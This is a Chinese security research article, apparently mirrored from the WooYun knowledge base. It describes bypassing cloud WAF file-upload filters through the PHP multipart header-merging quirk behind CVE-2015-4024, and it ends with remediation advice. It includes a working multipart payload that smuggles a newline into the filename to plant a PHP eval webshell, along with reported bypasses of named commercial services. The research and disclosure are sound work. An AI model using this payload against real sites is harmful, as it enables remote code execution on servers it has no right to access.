作者:
破見式
·
2016/01/08 10:03
0x00 背景介紹
今天我們想從2015.04.03的一個PHP遠端dos漏洞(CVE-2015-4024)說起。技術細節見如下連結,中文版:/papers/?id=6077,英文版 :https://bugs.php.net/bug.php?id=69364。因為php解析body part的header時進行字串拼接,而拼接過程重複複製字元導致DOS。事實上該漏洞還有其他非dos的利用價值,其中之一,就是繞過當前各種雲WAF的檔案上傳防禦策略。
目前國內外流行的雲WAF廠商有如百度雲加速,360網站衛士,加速樂,雲盾等。因為PHP遠端dos漏洞及PHP官方修復方案的特點,我們成功利用該漏洞繞過了當前主流WAF的檔案上傳防禦,例如百度雲加速、360網站衛士、知道創於加速樂、安全狗。
接下來,我們以PHP為例,詳細解析我們的繞過方法。
0x01 繞過WAF的原理
根據PHP DOS漏洞原理,在multipart_buffer_headers
函式解析header對應value時,value值存在n行。每行的字串以空白符開頭或不存字元':',都觸發以下合併value的程式碼塊。那麼解析header的value就要執行(n-1)次合併value的程式碼塊,從而導致DOS。
#!php
prev_len= strlen(prev_entry.value);
cur_len= strlen(line);
entry.value= emalloc(prev_len + cur_len + 1); //1次分片記憶體
memcpy(entry.value,prev_entry.value, prev_len); //1次複製
memcpy(entry.value+ prev_len, line, cur_len); //1次複製
entry.value[cur_len+ prev_len] = '\0';
entry.key= estrdup(prev_entry.key);
zend_llist_remove_tail(header);//1次記憶體釋放
而PHP官方修復方案,在進行合併時,避免重複複製,從而避免DOS。繞過WAF的關鍵在於,PHP multipart_buffer_headers
函式解析header對應value時,value值存在多行。每行的字串以空白符開頭或不存字元':',將進行合併。而WAF在解析檔案上傳的檔名時,沒有考慮協議相容,不進行多行合併,就可以被繞過。
根據原理構造繞過WAF檔案上傳防禦的payload,WAF解析到的檔名為”test3.jpg”,而PHP解析到的檔名是“test3.jpg\nf/shell.php
”,因為”/”是目錄分隔符,上傳的檔名變為shell.php。以下是繞過paylaod、測試指令碼、paylaod進行檔案上傳的效果圖。
WAF繞過payload:
#!php
------WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name="file"; filename="test3.jpg\nsf/shell.php
Content-Type: application/octet-stream
<?php eval($_GET['c'])?>
------WebKitFormBoundaryx7V4AhipWn8ig52y
檔案上傳功能測試腳:
#!php
<?php
$name = $_FILES['file']['name'];
echo $name;
echo "\n";
move_uploaded_file($_FILES['file']['tmp_name'] , '/usr/local/nginx/html/upload/'.$_FILES['file']['name']);
echo "upload success! ".$_FILES['file']['name'];
echo "\n";
echo strlen($_FILES['file']['name']);
?>
Payload能夠正常上傳
0x02 繞過WAF實戰
筆者透過搭建自己的測試站,接入360網站衛士和加速樂,驗證繞過WAF檔案上傳防禦的方法。
2.1 繞過360網站衛士
步驟1,驗證網站已被360網站衛士防禦,攔截了直接上傳PHP檔案的請求。
步驟2:成功繞過360網站衛士,上傳shell成功,檔案是apo.php。在該請求中,有沒有Content-Type不影響繞過。
2.2 繞過知道創宇加速樂
步驟一:驗證網站被加速樂保護,攔截了直接上傳PHP檔案的請求。
步驟二:
成功繞過加速樂,上傳shell,檔案是syt.php。
2.3 繞過百度雲加速
百度雲加速與CloudFlare,從百度勻加速攔截頁面可以看出使用的是CloudFlare. 但是估計有本地化,百度雲加速應該是百度和CloudFlare共同產物吧。測試百度沒有搭建自己的測試環境,找了個接入了百度雲加速的站進行測試。
步驟一:驗證網站被百度雲加速保護,攔截了直接上傳PHP檔案的請求。
步驟二:成功繞過雲加速
2.4 安全狗的測試
用該方法測試安全狗的檔案上傳,
#!bash
Content-Disposition: form-data; name="file"; filename="2.php
aa:
Content-Type: image/jpeg
php與aa這間的是%0a
,處理請求的Apache程式直接崩潰。感覺可以溢位,沒有深入。
2.5 CloudFlare的測試
為了測試能否繞過國外版的CloudFlare,特意買了它的服務。結果,在規則全開的情況下,競然不攔截檔案上傳。
2.6 Amazon WAF
亞馬遜的WAF沒有規則,所有規則需要使用者配置。在配置的選項裡,沒有檔案上傳的選項,所以也就沒有繞過的說法。國內WAF和國外WAF的區別挺大,為什麼這麼設計還是值得深思。
我們還繞過了其他WAF,這裡不一一列舉。
0x03 擴充套件—更多的工作
3.1 分析filename其他字元的繞過
同理,我們發現除了雙引號外,使用單引號也能繞過WAF的防禦,並實現檔案上傳。
#!php
------WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name="file"; filename='test3.jpg\nsf/shell.php
Content-Type: application/octet-stream
<?php eval($_GET['c'])?>
------WebKitFormBoundaryx7V4AhipWn8ig52y
3.2 分析其他應用指令碼語言
我們也發現jsp解析也有自己的特點,同時可被用於繞過WAF。暫時未測試asp,aspx,python等常用的WEB應用指令碼語言。
0x04 修復方案
4.1 修復方案一
解析檔案上傳請求時,如果發現請求不符合協議規範,則拒絕請求。可能會產生誤攔截,需要評估誤攔截的影響範圍。
4.2 修復方案二
相容php的檔案解析方式,解析檔名時,以單引號或雙引號開頭,並且對應的單引號或雙引號閉合。
0x05 總結
本文透過Review PHP遠端dos漏洞(CVE-2015-4024),並利用該特性繞過現有WAF的檔案上傳防禦,成功上傳shell。 更重要的價值,提供給我們一個繞過WAF的新思路,一種研究新方向:利用後端應用指令碼與WAF行為的差異繞過WAF的防禦。總的來說,一款優秀的WAF應該能夠處理相容WEB應用容器、標準協議、web伺服器這間的差異。
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!